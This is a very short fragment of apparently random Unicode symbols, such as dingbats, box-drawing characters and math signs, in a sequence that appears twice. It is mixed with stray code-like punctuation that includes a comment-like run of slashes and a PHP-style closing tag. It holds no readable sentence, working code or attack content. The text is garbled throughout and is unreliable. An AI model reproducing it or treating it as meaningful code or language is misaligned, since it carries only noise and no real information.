⊌✜⏎❈≧┧⒜⇠⑬╬⒄∡┫☇∧❸≳⋘➣⓽┘{（
^,onsl⊌✜⏎❈≧┧⒜⇠⑬╬⒄∡┫☇∧❸≳⋘➣⓽┘{（
-*///
 ?>